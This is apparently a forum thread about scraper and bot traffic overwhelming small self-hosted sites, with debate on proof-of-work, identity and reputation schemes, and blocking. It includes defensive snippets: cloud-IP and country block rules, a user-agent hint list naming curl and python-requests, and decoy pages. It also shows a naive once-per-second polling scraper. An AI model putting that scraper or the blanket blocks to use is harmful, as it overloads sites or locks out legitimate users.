I don't know if there's a simple solution to deploy this but JA3 fingerprinting is sometimes used to identify similar clients even if they're spread across IPs: https://engineering.salesforce.com/tls-fingerprinting-with-j...
When was the internet ever a safe haven, and from what exactly?
I wonder if a proof of work protocol is a viable solution. To GET the page, you have to spend enough electricity to solve a puzzle. The question is whether the threshold could be low enough for typical people on their phones to access the site easily, but high enough that mass scraping is significantly reduced.
There's this paper from 2004: "Proof-of-Work Proves Not to Work": https://www.cl.cam.ac.uk/~rnc1/proofwork.pdf
The conclusion back then was that it's impossible to make a threshold that is both low enough and high enough.
You need some other mechanism that can distinguish bad traffic from good (even if imperfectly), and then adjust the threshold based on it. See, for instance, "Proof of Work can Work": https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
Thanks for these references! I imagine the numbers would be entirely different in our context (20 years later, and web serving, not email sending). And the idea of spammers using botnets (therefore not paying for compute themselves) would be less relevant to LLM scraping. But I’ll try to check for forward references on these.
I feel like it could work. If you think about it, you need the cost to the client to be greater than the cost to the server. As long as that is true the server shouldn't mind about increased traffic because it's making a profit!
Very crudely if you think that a request costs the server ~10ms of compute time and a phone is 30x slower then you'd need 300ms of client compute time to equal it which seems very reasonable.
The only problem is you would need a cryptocurrency that a) lets you verify tiny chunks of work, b) can't be done faster on other hardware than on a phone, and c) lets a client mine money without being able to actually spend it ("homomorphic mining"?).
I don't know if anything like that exists but it would be an interesting problem to solve.
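For what it's worth, the mechanics don't need a cryptocurrency at all: a hashcash-style challenge covers the "spend electricity to GET the page" part, and the hard problem the thread identifies is only the choice of difficulty. A rough sketch, with the difficulty value picked arbitrarily:

    # Rough sketch of a hashcash-style challenge: verification is one hash,
    # solving takes on the order of 2^bits hash attempts.
    import hashlib
    import secrets

    def make_challenge() -> str:
        return secrets.token_hex(16)

    def leading_zero_bits(digest: bytes) -> int:
        value = int.from_bytes(digest, "big")
        total = len(digest) * 8
        return total if value == 0 else total - value.bit_length()

    def solve(challenge: str, bits: int = 20) -> int:
        counter = 0
        while True:
            digest = hashlib.sha256(f"{challenge}:{counter}".encode()).digest()
            if leading_zero_bits(digest) >= bits:
                return counter            # client sends this back with the request
            counter += 1

    def verify(challenge: str, counter: int, bits: int = 20) -> bool:
        digest = hashlib.sha256(f"{challenge}:{counter}".encode()).digest()
        return leading_zero_bits(digest) >= bits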
I'm sorry, but it literally didn't work, as the other commenter cited: if you make the requirement like that, it basically cancels out the other effect.
> What's missing is effective international law enforcement.
International law enforcement on the Internet would also subject you to the laws of other countries. It goes both ways.
Having to comply with all of the speech laws and restrictions in other countries is not actually something you want.
We have historically solved this via treaties.
If you want to trade with me, a country that exports software, let's agree to both criminalize software piracy.
No reason why this can't be extended to DDoS attacks.
This is already kind of true with every global website, the idea of a single global internet is one of those fairy tale fantasy things, that maybe happened for a little bit before enough people used it. In many cases it isn't really ideal today.
Good points; I would definitely vouch for an independent standard for request signing + some kind of decentralized reputation system. With international law enforcement, I think there could be too many political issues for it not become corrupt
I don’t think this can solved legally without compromising anonymity. You can block unrecognized clients and punish the owners of clients that behave badly, but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
> but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
It's not necessarily going through a Russian or Singaporean node though, on the sites I'm responsible for, AWS, GCP, Azure are in the top 5 for attackers. It's just that they don't care _at all_ about that happening.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
The big cloud providers need to step up and take responsibility. I understand it can't be easy to do, but we really do need a way to contact e.g. AWS and tell them to shut off a customer. I have no problem with someone scraping our websites, but I do care when they don't do it responsibly: slow down when we start responding slower, don't assume you can just go full throttle, crash our site, wait, and then do it again once we start responding again.
You're absolutely right: AWS, GCP, Azure and the others do not care, and AWS and GCP in particular are massive enablers.
> we really do need a way to contact e.g. AWS and tell them to shut off a customer.
You realize you just described the infrastructure for far worse abuse than a misconfigured scraper, right?
Using AI you can write a naive scraper in minutes and there's now a market demand for cleaned up and structured data.
I'm pretty sure it is the commercial demand for data from AI companies. It is certainly the popular conception among sysadmins that it is AI companies who are responsible for the wave of scrapers over the past few years, and I see no compelling alternative.
> and I see no compelling alternative.
Another potential cause: it's now way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I'd wager even the less capable LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you get an order-of-magnitude increase in traffic across the internet. This has been possible since, what, sometime in 2023? Not sure if the patterns would line up, but it's just another guess at the cause(s).
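For a sense of how low the bar is, here's roughly the kind of thing an LLM will happily spit out for that prompt. Purely illustrative: the URL is hypothetical, and the point is what's missing (no caching, no backoff, no robots.txt, just a hammer on a timer):

```python
# Naive "check this site every second for updates" script, the kind an LLM
# will generate on request. Note what's absent: no caching headers, no
# backoff on errors, no robots.txt check -- it just polls forever.
import time
import urllib.request

URL = "https://example.com/products"  # hypothetical target
last_seen = None

while True:
    try:
        with urllib.request.urlopen(URL, timeout=10) as resp:
            body = resp.read()
        if body != last_seen:
            print("Something changed!")
            last_seen = body
    except Exception as exc:
        print("Request failed:", exc)  # ...and retry immediately anyway
    time.sleep(1)  # one request per second, per page, per person
```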
> long-term solution
How about a reputation system?
Attaching it to an IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing the anti-abuse onus onto ISPs)?
This is basically what happened to email/SMTP, for better or worse :-S.
It's ironic to use a reputation system for this.
20+ years ago there were mail blacklists that basically blocked residential IP blocks, since there shouldn't be servers trying to send normal mail from there. Now you have to try the opposite: blacklist blocks where only servers, and not end users, can come from, since there are potentially badly behaved scrapers in all the major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests for misbehaving companies, so closing that door is an imperfect mitigation too.
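As a rough sketch of what "blacklist the server blocks" looks like in practice: the big clouds publish their IP ranges (AWS's live at ip-ranges.amazonaws.com), so you can build block rules from them. The ipset name and the blanket block here are illustrative assumptions, not a recommendation, and as noted, residential proxies walk right past it:

```python
# Sketch: build block rules from a cloud provider's published IP ranges.
# AWS publishes its ranges at the URL below; the ipset name and the decision
# to block *everything* are illustrative assumptions only.
import json
import urllib.request

RANGES_URL = "https://ip-ranges.amazonaws.com/ip-ranges.json"

with urllib.request.urlopen(RANGES_URL, timeout=30) as resp:
    data = json.load(resp)

prefixes = sorted({p["ip_prefix"] for p in data["prefixes"]})

# Emit shell commands instead of applying them, so you can review first.
print("ipset create cloud-block hash:net -exist")
for prefix in prefixes:
    print(f"ipset add cloud-block {prefix} -exist")
print("iptables -I INPUT -m set --match-set cloud-block src -j DROP")
```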
It's interesting that along another axis, the inertia of the internet moved from a decentralized structure back toward something that resembles mainframes. I don't think those axes are orthogonal.
Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don’t care about knowing your exact identity, but being able to ban a person and not have them simply register a new account, and being able to stop people from registering thousands of accounts, would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
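The "unique per-service, not tied to real identity" part is the easy half to sketch: derive the service-facing ID from a single per-person secret, so no two services can correlate users. The hard properties (exactly one per person, and no more than one) still need some issuer to hand out that secret, and that issuer is where all the real difficulty lives. A minimal sketch, with the issuer entirely hand-waved:

```python
# Sketch: per-service pseudonyms derived from one per-person secret.
# Assumes some issuer has handed the person exactly one high-entropy secret
# (that is the hard, unsolved part); given that, the derived IDs are stable
# per service, unlinkable across services, and reveal nothing about identity.
import hmac
import hashlib
import secrets

person_secret = secrets.token_bytes(32)  # stand-in for an issuer-provided secret

def service_pseudonym(person_secret: bytes, service_domain: str) -> str:
    """Stable, per-service identifier that can't be linked across services."""
    mac = hmac.new(person_secret, service_domain.encode(), hashlib.sha256)
    return mac.hexdigest()

print(service_pseudonym(person_secret, "forum.example"))  # same every time
print(service_pseudonym(person_secret, "shop.example"))   # different, uncorrelated
```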
A digital "death penalty" is not a win for society without a fair way to atone for "crimes against your digital identity".
It would be way too easy for the current regime (whoever that happens to be) to criminalize random behaviors (Trans people? Atheists? Some random nationality?) and ban their identities, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Describing “I don’t want to provide service to you and I should have the means of doing so” as a “digital death penalty” is a tad hyperbolic, don’t you think?
> It would be way too easy for the current regime (whoever that happens to be) to criminalize random behaviors (Trans people? Atheists? Some random nationality?) and ban their identities, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
If creating an identity has a cost, then why not allow people to own multiple identities? Might help on the privacy front and address the permadeath issue.
Of course everything sounds plausible when speaking at such a high level.
I agree, and I think the ability to spin up new identities is crucial to any sort of successful reputation system (and reflects the realities of how both good and bad actors would use it). Think back to the early internet, when you wanted an identity in one community (e.g. forums about games you play) that was separate from another (e.g. banking). But it means those reputation identities need to take some investment (of time, contribution, whatever) to build, and can't become usefully trusted until reaching some threshold.
Because of course what this world needs is for the wealthy to have even more advantages over the normies. (Hint: If you're reading this, and think you're one of the wealthy ones, you aren't)
Zero-knowledge proof constructs have the potential to solve these kinds of privacy/reputation tradeoffs.
I guess it is just because 1) they can, and 2) everyone wants some data. I think it would be interesting if every website out there started to push out BS pages just for scrapers. Not sure how much extra cost it would take if a website put up, say, 50% BS pages that only scrapers can reach, or BS material in extremely small fonts hidden in regular pages that ordinary people cannot see.
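A toy version of the idea, just to show the shape of it (hypothetical paths, and a crude user-agent check standing in for whatever bot detection you actually trust):

```python
# Toy decoy server: real visitors get the normal page, suspected scrapers get
# an endless maze of junk pages that link to more junk. The user-agent check
# is a crude stand-in for real bot detection.
import random
from http.server import BaseHTTPRequestHandler, HTTPServer

BOT_HINTS = ("python-requests", "curl", "scrapy", "bot")

def looks_like_bot(user_agent: str) -> bool:
    ua = user_agent.lower()
    return any(hint in ua for hint in BOT_HINTS)

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if looks_like_bot(self.headers.get("User-Agent", "")):
            links = "".join(
                f'<a href="/page-{random.randint(0, 10**9)}">more</a> '
                for _ in range(20)
            )
            body = f"<html><body><p>{'filler text ' * 200}</p>{links}</body></html>"
        else:
            body = "<html><body>The actual site.</body></html>"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```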
Something like https://blog.cloudflare.com/ai-labyrinth/ ?
Why? It’s because of AI. It enables attacks at scale. It enables more people to attack, who previously couldn’t. And so on.
It’s very explainable. And somehow, like clockwork, there are always comments to say “there is nothing new, the Internet has always been like this since the 80s”.
You know, part of me wants to see AI proliferate into more and more areas, just so these people will finally wake up eventually and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own specific reputation is constantly attacked and destroyed by 1000 cuts not just online but in their own trusted circles, and they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Our tech overlords understand AI, especially any form of AGI, will basically be the end of humanity. That’s why they’re entirely focused on being the first and amassing as much wealth in the meanwhile, giving up on any sort of consideration whether they’re doing good for people or not.
Isn’t this problem why Cloudflare is popular? You can write your own server, but outsource protecting it from bots.
Perhaps there are better alternatives?
Unpopular opinion: the real source of the problem is not scrapers, but your unoptimized web software. Gitea and Fail2ban are resource hogs in your case, either unoptimized or poorly configured.
My tiny personal web servers can withstand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers cause any issues.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
Sad, but hosting static content like his site in a cloud would save him the headache. I know, I know, he must "do it yourself", but if that is his path he knows the price. Maybe I am wrong and do not understand the problem, but it seems like asking for a headache.
I think the author would agree, and that is in fact the point of his post.
The only way to solve these problems is using some large hosted platform where they have the resources to constantly be managing these issues. This would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
I think it has been hard to host a site since about 2007. I stopped then because it is too much work to keep it safe. It's even worse now, but it has always been extra work ever since search engines came along. Maybe the OP is just getting older and wants to spend time with his kids and not play with nginx, haha.
I run a dedicated firewall/dns box with netfilter rules to rate limit new connections per IP. It looks like I may need to change that to rate limit per /16 subnet...
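(For what it's worth, netfilter's hashlimit match can group by prefix directly via --hashlimit-srcmask 16. Below is a sketch of the same per-/16 bucketing done at the application level instead, with made-up thresholds:)

```python
# Sketch: rate limiting per /16 prefix instead of per IP.
# (netfilter can do the same with hashlimit's --hashlimit-srcmask 16; this is
# the application-level equivalent, with illustrative limits.)
import ipaddress
import time
from collections import defaultdict

WINDOW_SECONDS = 10
MAX_PER_PREFIX = 100  # illustrative threshold

hits: dict[str, list[float]] = defaultdict(list)

def allow(client_ip: str) -> bool:
    """Return False if this client's /16 has exceeded the window budget."""
    prefix = str(ipaddress.ip_network(f"{client_ip}/16", strict=False))
    now = time.monotonic()
    recent = [t for t in hits[prefix] if now - t < WINDOW_SECONDS]
    recent.append(now)
    hits[prefix] = recent
    return len(recent) <= MAX_PER_PREFIX

# e.g. every request from 47.79.x.x lands in the same bucket:
print(allow("47.79.12.34"))
print(allow("47.79.200.1"))
```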
The Internet has really been an interesting case study for what happens between people when you remove a varying number of layers of social control.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
"Socialists"* argue for more regulations; "liberals" claim that there should be financial incentives to not do that.
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to – maybe not prevent, but somewhat alleviate – the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
--
*) For the lack of a better word.
The problem with anything, anything, without a centralized authority, is that friction overwhelms inertia. Bad actors exist and have no mercy, while good people downplay them until it’s too late. Entropy always wins. Misguided people assume the problem is powerful people, when the problem is actually what the powerful people use their authority to do, as powerful people will always exist. Accepting that and maintaining oversight is the historically successful norm; abolishing them has always failed.
As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.
The internet has made the world small, and that's a problem. Nation states typically had a limited range for broadcasting their authority in the more distant past. A bad ruler couldn't rule the entire world, nor could they cause trouble for the entire world. From nukes to the interconnected web, the worst of us with power can affect everyone else.
Power is a spectrum. Power differentials will always exist but we can absolutely strive to make them smaller and smaller.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
The Internet was a scene, and like all scenes it's done now that the corpos have moved in and taken over (because at that point it's just ads and rent extraction in perpetuity). I dunno what/where/when the next tech scene will be, but I do know it's not going to come from Big Tech. See: Metaverse.
Had to ban RU, CN, SG, and KR just because of the volume of spam. The random referer headers have recently become a problem.
This is particularly annoying as knowing where people come from is important.
It's just another reason to give up making stuff and give in to FAANG and the AI enshittification.
:-(
If you only care about regular users, I'd advise banning all known datacenters, Browserbase, China, and Brazil.
I also banned the Middle East. Logs actually reflected real users, costs dropped, and my mental health improved.
Win-win.
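For reference, the country part of that is only a few lines once you have MaxMind's free GeoLite2 database downloaded; a sketch, with an illustrative block list rather than a recommendation:

```python
# Sketch: drop requests by country before they reach the app.
# Assumes you've downloaded MaxMind's free GeoLite2-Country database;
# the blocked-country set here is illustrative only.
import geoip2.database
import geoip2.errors

BLOCKED = {"RU", "CN", "SG", "KR", "BR"}
reader = geoip2.database.Reader("GeoLite2-Country.mmdb")

def is_blocked(client_ip: str) -> bool:
    try:
        country = reader.country(client_ip).country.iso_code
    except geoip2.errors.AddressNotFoundError:
        return False  # unknown location: let it through (or flip this default)
    return country in BLOCKED

print(is_blocked("8.8.8.8"))
```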
The internet is over. If we want to recapture the magic of the earlier times, we are going to have to invent something new.
The magical times in the past have always been marked with being able to be part of an "exclusive club" that takes something from nothing to changing the world.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
> magical times can never be had again
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gatekeeping: the people on it were selected by the technical skill required to get there. Generally, people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
Third spaces and the free time to explore them?
No no, that doesn't maximize shareholder value.
Haha, you could host on Gemini instead of HTTP. You’d simulate the old internet in that only enthusiasts would come!
There is no something new. Anything we invent will be able to be taken over by complex bots. Welcome to the future shock, where humans aren't at the top of their domain.
going back to Gopher?
Gopher still requires the Internet. I know it's pretty common to conflate "the Internet" with "the World Wide Web", but there are actually other protocols out there (like Gopher).
I don't see a solution then.
Why would that help?
The internet hasn't been a safe haven since the 80s, or maybe earlier (that was before my time, and it's never been one since I got online in the early 90s).
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Given that the World Wide Web was invented in 1989... are you saying that the Internet was safer when only FTP and Usenet existed?
Was it a safe haven or was it less safe but simply an unprofitable target?
> The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Apple and Alphabet seem positioned to easily enable it.
https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
Alphabet, the company that bans people for opaque reasons with no recourse? Good idea. Maybe tech should not be in charge of digital identification.
The governments like it that way. They want banks and tech companies to be intermediaries that are more difficult to hold accountable, because they can just say “we didn’t feel like doing business with this person”.
I don’t get it. That link refers to Apple letting you put your passport and drivers license info in the wallet on your phone.
Apple’s Wallet app presents this feature as being for “age and identity verification in apps, online and in person”.
The real internet has yet to be invented.
It's probably just time for the web page to die
What do you mean by that? Web pages are the central mechanism we use to put information on the web. Of course many websites are shitty and could convey their information much more simply without looking like crap at all. But the web page in general? Why would we ever get rid of something so useful? And what do you suggest as an alternative?
...they said, on a web page.
The common man never had a need for the internet or global connectedness. DARPA wanted to push the technology to gain the upper hand in world affairs. Universities pushed the technology to show progress and sell research. Businesses pushed the technology to get more sales. It was a kind of acid rain caused by the establishment and sold as scented rain.
This sentiment - along the lines of "the world became too dependent on the Internet", "Internet wasn't a good thing to begin with", "Internet is a threat to national security" etc - has been popping up on HN too often lately, emerged too abruptly and correlates with the recent initiatives to crack down on the Internet too well.
If this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
You don't need to have a solution to explore a problem, in my opinion. The OP's comment is problematic, but for reasons other than not having a proposed solution.
> The common man never had a need for the internet or global connectedness
That's not how culture evolves. You don't necessarily need to have a problem in order for a solution to be developed. You can very well have a technology developed for other purposes, or just for exploration's sake, and then, once the tech exists, uses for it start to pop up post hoc.
You're therefore ignoring the immense benefit of access to information that the technology brings. It wasn't necessarily a problem for the common man, but once it's there, once access to information is popularized, people adapt and grow dependent on it. Just like electricity.
> immense benefits??
People with dial-up phones never asked for a smartphone connected to the internet. They were just as happy back then, or even happier, because the phone didn't eat up their time or cause posture problems.
Sure, shopping was slower without the Amazon website, but it wasn't a less happy experience back then. In fact, homes had less junk and people saved more money.
Messaging? Sure, it lets you spend time in 100 WhatsApp groups where 99% of the people don't know you personally.
It helped companies to sell more of the junk more quickly.
It created bloggers and content creators who lived in an imaginary world thinking that someone really consumes their content.
It created karma beggars who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies, which don't solve any of the world's problems or the basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?